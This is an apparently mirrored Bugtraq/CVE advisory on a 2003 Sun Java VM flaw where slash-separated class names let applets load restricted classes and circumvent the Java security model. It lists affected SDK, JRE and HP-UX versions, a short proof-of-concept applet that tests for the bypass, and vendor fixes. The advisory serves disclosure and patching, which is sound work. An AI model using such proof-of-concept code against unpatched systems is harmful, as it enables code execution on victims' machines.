Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability

BID:8879

CVE-2006-4302 |

Info

Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability

Bugtraq ID: 8879
Class: Design Error
CVE:
Remote: Yes
Local: No
Published: Oct 22 2003 12:00AM
Updated: Oct 22 2003 12:00AM
Credit: Discovery is credited to Last Stage of Delirium.
Vulnerable: Sun SDK (Windows Production Release) 1.4.1 _03
Sun SDK (Windows Production Release) 1.4.1 _02
Sun SDK (Windows Production Release) 1.4.1 _01
Sun SDK (Windows Production Release) 1.4.1
Sun SDK (Windows Production Release) 1.3.1 _07
Sun SDK (Windows Production Release) 1.3.1 _06
Sun SDK (Windows Production Release) 1.3.1 _05
Sun SDK (Windows Production Release) 1.3.1 _04
Sun SDK (Windows Production Release) 1.3.1 _03
Sun SDK (Windows Production Release) 1.3.1 _02
Sun SDK (Windows Production Release) 1.3.1 _01a
Sun SDK (Windows Production Release) 1.2.2 _015
Sun SDK (Windows Production Release) 1.2.2 _014
Sun SDK (Windows Production Release) 1.2.2 _013
Sun SDK (Windows Production Release) 1.2.2 _012
Sun SDK (Windows Production Release) 1.2.2 _012
Sun SDK (Windows Production Release) 1.2.2 _011
Sun SDK (Windows Production Release) 1.2.2 _010
Sun SDK (Solaris Reference Release) 1.2.2 _015
Sun SDK (Solaris Reference Release) 1.2.2 _014
Sun SDK (Solaris Reference Release) 1.2.2 _013
Sun SDK (Solaris Reference Release) 1.2.2 _012
Sun SDK (Solaris Reference Release) 1.2.2 _011
Sun SDK (Solaris Reference Release) 1.2.2 _010
Sun SDK (Solaris Production Release) 1.4.1 _03
Sun SDK (Solaris Production Release) 1.4.1 _02
Sun SDK (Solaris Production Release) 1.4.1 _01
Sun SDK (Solaris Production Release) 1.4.1
Sun SDK (Solaris Production Release) 1.3.1 _07
Sun SDK (Solaris Production Release) 1.3.1 _06
Sun SDK (Solaris Production Release) 1.3.1 _05
Sun SDK (Solaris Production Release) 1.3.1 _03
Sun SDK (Solaris Production Release) 1.3.1 _02
Sun SDK (Solaris Production Release) 1.3.1 _01
Sun SDK (Solaris Production Release) 1.2.2 _14
Sun SDK (Solaris Production Release) 1.2.2 _13
Sun SDK (Solaris Production Release) 1.2.2 _12
Sun SDK (Solaris Production Release) 1.2.2 _11
Sun SDK (Solaris Production Release) 1.2.2 _10
Sun SDK (Solaris Production Release) 1.2.2 _07a
Sun SDK (Solaris Production Release) 1.2.2
Sun SDK (Linux Production Release) 1.4.1 _03
Sun SDK (Linux Production Release) 1.4.1 _02
Sun SDK (Linux Production Release) 1.4.1 _01
Sun SDK (Linux Production Release) 1.4.1
Sun SDK (Linux Production Release) 1.3.1 _07
Sun SDK (Linux Production Release) 1.3.1 _06
Sun SDK (Linux Production Release) 1.3.1 _05
Sun SDK (Linux Production Release) 1.3.1 _03
Sun SDK (Linux Production Release) 1.3.1 _02
Sun SDK (Linux Production Release) 1.3.1 _01
Sun SDK (Linux Production Release) 1.2.2 _13
Sun SDK (Linux Production Release) 1.2.2 _12
Sun SDK (Linux Production Release) 1.2.2 _015
Sun SDK (Linux Production Release) 1.2.2 _014
Sun SDK (Linux Production Release) 1.2.2 _011
Sun SDK (Linux Production Release) 1.2.2 _010
Sun JRE (Windows Production Release) 1.4.2 _01
Sun JRE (Windows Production Release) 1.4.1 _03
Sun JRE (Windows Production Release) 1.4.1 _02
Sun JRE (Windows Production Release) 1.4.1 _01
+ Opera Software Opera Web Browser 7.11 j
+ Opera Software Opera Web Browser 7.11
Sun JRE (Windows Production Release) 1.4.1
Sun JRE (Windows Production Release) 1.3.1 _07
Sun JRE (Windows Production Release) 1.3.1 _06
Sun JRE (Windows Production Release) 1.3.1 _05
Sun JRE (Windows Production Release) 1.3.1 _04
Sun JRE (Windows Production Release) 1.3.1 _03
+ Macromedia ColdFusion Server MX Professional
+ Macromedia ColdFusion Server MX Enterprise
+ Macromedia ColdFusion Server MX Developer
Sun JRE (Windows Production Release) 1.3.1 _02
Sun JRE (Windows Production Release) 1.3.1 _01a
Sun JRE (Windows Production Release) 1.3.1 _01
Sun JRE (Windows Production Release) 1.2.2 _015
Sun JRE (Windows Production Release) 1.2.2 _014
Sun JRE (Windows Production Release) 1.2.2 _013
Sun JRE (Windows Production Release) 1.2.2 _011
Sun JRE (Windows Production Release) 1.2.2 _010
Sun JRE (Windows Production Release) 1.2.2
Sun JRE (Solaris Production Release) 1.4.1 _03
Sun JRE (Solaris Production Release) 1.4.1 _02
Sun JRE (Solaris Production Release) 1.4.1 _01
Sun JRE (Solaris Production Release) 1.4.1
Sun JRE (Solaris Production Release) 1.3.1 _07
Sun JRE (Solaris Production Release) 1.3.1 _06
Sun JRE (Solaris Production Release) 1.3.1 _05
Sun JRE (Solaris Production Release) 1.3.1 _04
Sun JRE (Solaris Production Release) 1.3.1 _03
+ Macromedia ColdFusion Server MX Professional
+ Macromedia ColdFusion Server MX Enterprise
+ Macromedia ColdFusion Server MX Developer
Sun JRE (Solaris Production Release) 1.3.1 _02
Sun JRE (Solaris Production Release) 1.3.1 _01
Sun JRE (Solaris Production Release) 1.2.2 _014
Sun JRE (Solaris Production Release) 1.2.2 _013
Sun JRE (Solaris Production Release) 1.2.2 _012
Sun JRE (Solaris Production Release) 1.2.2 _011
Sun JRE (Solaris Production Release) 1.2.2 _010
Sun JRE (Solaris Production Release) 1.2.2
Sun JRE (Reference Release) 1.2.2 _011
Sun JRE (Reference Release) 1.2.2 _010
Sun JRE (Linux Production Release) 1.4.1 _03
Sun JRE (Linux Production Release) 1.4.1 _02
Sun JRE (Linux Production Release) 1.4.1 _01
Sun JRE (Linux Production Release) 1.4.1
Sun JRE (Linux Production Release) 1.3.1 _07
Sun JRE (Linux Production Release) 1.3.1 _06
Sun JRE (Linux Production Release) 1.3.1 _05
Sun JRE (Linux Production Release) 1.3.1 _03
Sun JRE (Linux Production Release) 1.3.1 _02
Sun JRE (Linux Production Release) 1.3.1 _01
Sun JRE (Linux Production Release) 1.3.1
Sun JRE (Linux Production Release) 1.2.2 _015
Sun JRE (Linux Production Release) 1.2.2 _014
Sun JRE (Linux Production Release) 1.2.2 _013
Sun JRE (Linux Production Release) 1.2.2 _011
Sun JRE (Linux Production Release) 1.2.2 _010
Sun JRE (Linux Production Release) 1.2.2 _007
Sun JRE (Linux Production Release) 1.2.2 _006
Sun JRE (Linux Production Release) 1.2.2 _005
- Debian Linux 2.2
- Mandriva Linux Mandrake 7.2
- Redhat Linux 7.0
- SuSE Linux 7.0
Sun JRE (Linux Production Release) 1.2.2 _004
Sun JRE (Linux Production Release) 1.2.2 _003
Sun JRE (Linux Production Release) 1.2.2
HP HP-UX (VVOS) 11.0 4
HP HP-UX 11.23
HP HP-UX 11.22
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
HP HP-UX B.11.23
HP HP-UX B.11.22
HP HP-UX B.11.11
HP HP-UX B.11.04
HP HP-UX B.11.00
Not Vulnerable:

Discussion

Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability

A vulnerability has been identified in the Sun Java Virtual Machine packaged with JRE and SDK. This issue results in the circumvention of the Java Security Model, and can permit an attacker to execute arbitrary code on vulnerable hosts.

Exploit / POC

Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability

The following proof-of-concept code has been made available by Alla Bezroutchko <[email protected]>:

import java.applet.Applet;
import java.awt.Graphics;
import java.lang.Class;
import java.security.AccessControlException;

public class Simple extends Applet {

StringBuffer buffer;

public void init() {
buffer = new StringBuffer();
}

public void start() {
ClassLoader cl = this.getClass().getClassLoader();
try {
Class cla =
cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes
addItem("No exception in loadClass. Vulnerable!");
} catch (ClassNotFoundException e) {
addItem("ClassNotFoundException in loadClass - " + e);
} catch (AccessControlException e) {
addItem("AccessControlException in loadClass - Not
Vulnerable!");
}

}

void addItem(String newWord) {
System.out.println(newWord);
buffer.append(newWord);
repaint();
}

public void paint(Graphics g) {
//Draw a Rectangle around the applet's display area.
g.drawRect(0, 0, size().width - 1, size().height - 1);

//Draw the current string inside the rectangle.
g.drawString(buffer.toString(), 5, 15);
}
}

Solution / Fix

Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability

Solution:
HP has released an advisory (HPSBUX0311-295) to address this issue. HP suggests the following manual updates:

Java 1.4.1.04 or later (T1456AA (JDK 1.4), T1457AA (JRE 1.4))
Java 1.3.1.11 or later (B9788AA (JDK 1.3), B9789AA (JRE 1,3))
Java 1.2.1.16 or later (B8110AA (JDK 1.2), B8111AA (JRE 1.2))

These updates may be obtained from www.hp.com/go/java. HP revised their advisory to include details about HP-UX 11.04 (VVOS). This issue affects HP-UX 11.04 (VVOS) with Virtualvault A.04.50 or Virtualvault A.04.60 or Virtualvault A.04.70 installed. These platforms are only affected if Java has been downloaded and integrated on Virtualvault. Further details may be found in the advisory.

This issue is addressed in the following SDK and JRE versions of Windows Production Releases, Solaris OE Production Releases and Linux Production Releases:

SDK and JRE 1.4.1_04 and later
SDK and JRE 1.3.1_09 and later
SDK and JRE 1.2.2_016 and later

Solaris Operating Environment (OE) Reference Releases SDK and JRE 1.2.2_016 and later also include fixes.

Fixes are available at the following location:

http://java.sun.com/j2se/

See referenced advisory for additional details.

HP has released an update the their original advisory stating that more HP-UX versions are affected that were originally reported. Please see the referenced advisory for more information.

References

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report